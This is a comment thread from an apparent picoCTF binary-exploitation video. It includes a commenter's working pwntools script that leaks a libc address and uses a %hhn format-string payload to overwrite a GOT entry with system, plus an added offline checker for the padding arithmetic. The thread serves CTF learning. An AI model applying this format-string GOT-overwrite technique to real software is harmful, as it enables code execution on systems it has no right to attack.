Any documents??
Which place do you learn from, because I know a little bit of English 😢
Mostly by reading writeups at CTF time
Next time please take it slowly, step by step, because it's hard to understand you.
Thanks for the feedback
thanks!
you're welcome! Glad you liked it.
Nice vid. The %03d padding for the payload was neat. Given that setvbuf and system are 0x2ac90 distant in the libc Ghidra listing, why not take that number from the given setvbuf address to get the system address? Don't think the printf buffer is character limited. Was nice to see the Makefile too at pwn.
from pwn import *
io = remote('rhea.picoctf.net', 54882)
context.log_level = 'debug'
print(io.recvuntil('in libc: '))
setvbuf_addr = io.recvuntil('\n', drop=True) # bytes, e.g. b'0x7f...'
print(setvbuf_addr)
system_addr = hex(int(setvbuf_addr[2:],16)-0x2ac90)[2:] # first [2:] strips b'0x' from the bytes; hex()[2:] strips the '0x' again, leaving a 12-digit str
print(system_addr)
byte3 = int(system_addr[6:8],16) # decimal values for %hhn character count
byte2 = int(system_addr[8:10],16)
byte1 = int(system_addr[10:12],16) # always 96 (0x60) so no calculation required
filler1 = (byte2 - byte1 - 4) % 256 or 256 # -4 accounts for ,ZZ, characters in payload; the mod keeps a small or negative difference positive, and 0 becomes 256 because %0c still prints one char
filler2 = (byte3 - byte2 - 4) % 256 or 256
payload = ''
payload += '%92cZZZ,%44$hhn,' # 92 characters plus ZZZ, gives 96
payload += '%' + '%03d'%filler1 + 'cZZ,' + '%45$hhn,' # %03d keeps every group 16 bytes so the stack slots stay put
payload += '%' + '%03d'%filler2 + 'cZZ,' + '%46$hhn,'
# the three target addresses (little-endian), one per %hhn slot; they hold NUL bytes, so they come after the last directive
payload = payload.encode() + p64(0x404018) + p64(0x404019) + p64(0x40401a)
print(payload)
io.sendline(payload)
io.interactive()
Doing that subtraction is a better idea than what I did.
@@carlislemc The pico challenges have been interesting this year and your videos have been brilliant. The single byte %hhn approach is powerful, because even with a negative difference between bytes, the mod arithmetic takes care of it.
@@robertdreyfus5436 thanks for the kind words
Thanks for your script man, much easier to understand!
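The %hhn counter arithmetic in the script above and the mod-256 point in the reply: an added Python example (not the commenter's or the video's code) that simulates printf's character count so the widths of such a payload can be checked offline. The slot numbers 44 to 46 mirror the posted payload; the function names and the sample target bytes are my own.

```python
import re

# Added example, not the commenter's or the video's code. It checks the
# %hhn counter arithmetic offline by simulating printf's character count,
# so the widths in a payload can be verified before anything is sent.
# Slot numbers 44-46 mirror the posted payload; everything else is my own.

def hhn_width(count, target, literal):
    """Padding width for a %c so that, after `width` pad characters plus
    `literal` separator characters, the running count equals `target`
    modulo 256.  Modular subtraction is what makes a target byte smaller
    than the current count harmless: it simply wraps around.  A width of
    0 is bumped to 256 because '%0c' still prints one character."""
    width = (target - count - literal) % 256
    return width or 256

def build_groups(targets, slots):
    """One fixed 16-byte group '%<www>cZZ,%<ss>$hhn,' per target byte, so
    the stack slot indices stay valid however the widths come out."""
    fmt, count = "", 0
    for byte, slot in zip(targets, slots):
        pad = hhn_width(count, byte, literal=3)   # "ZZ," follows the %c
        fmt += f"%{pad:03d}cZZ,%{slot}$hhn,"
        count += pad + 3                          # what this %hhn stores
        count += 1                                # trailing "," before next group
    return fmt

_TOKEN = re.compile(r"%(\d+)c|%(\d+)\$hhn|(.)", re.S)

def simulate_printf(fmt):
    """Walk `fmt` the way printf would, counting emitted characters and
    recording the low byte stored by each %N$hhn.  Parsing stops at the
    first NUL, which is why raw little-endian addresses (full of 0x00)
    must sit after the last directive in the posted payload."""
    count, writes = 0, {}
    for pad, slot, lit in _TOKEN.findall(fmt):
        if pad:
            count += max(int(pad), 1)             # %Nc prints at least one char
        elif slot:
            writes[int(slot)] = count & 0xFF
        elif lit == "\x00":
            break
        else:
            count += 1
    return writes

if __name__ == "__main__":
    wanted = [0x60, 0x12, 0xFE]                   # 0x60 -> 0x12 is a "negative" step
    fmt = build_groups(wanted, [44, 45, 46])
    print(fmt, simulate_printf(fmt))
```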